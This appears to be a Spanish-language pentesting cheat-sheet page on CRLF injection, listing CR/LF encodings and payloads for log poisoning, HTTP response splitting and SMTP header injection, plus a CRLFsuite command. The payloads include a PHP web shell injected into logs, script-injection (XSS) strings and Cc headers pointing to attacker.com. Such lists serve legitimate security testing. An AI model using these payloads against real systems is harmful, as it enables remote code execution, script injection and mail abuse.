CRLF injection
Descripción
Carácter
ASCII (Dec)
Hex
URL Encoded
Carriage Return (CR)
\r
13
0x0D
%0D
Line Feed (LF)
\n
10
0x0A
%0A
CRLF
\r\n
13 10
0x0D0A
%0D%0A
Log injection
# Log poisoning
%0D%0A<?php system($_GET['cmd']); ?>
HTTP response splitting
# HTTP header
%0D%0AHeader-Test: value-test
# XSS
%0D%0A%0D%0A<html><script>alert(1)</script></html>
# HTTP header Content-Type + XSS
%0D%0AContent-Type: text/html%0D%0A%0D%0A<html><script>alert(1)</script></html>
SMTP header injection
# SMTP header
%0D%0AHeader-Test: value-test
## URL encoder
%0D%0AHeader-Test:+value-test
# SMTP header Cc
%0D%0ACc: [email protected]
%0D%0ACc: [email protected]%0D%0ADoesNotExist: True
## URL encoder
%0D%0ACc:+email%40attacker.com
%0D%0ACc:+email%40attacker.com%0D%0ADoesNotExist:+True
Herramientas
CRLFsuite
crlfsuite -t http://<target>/param1=value1¶m2=value2
Última actualización
¿Te fue útil?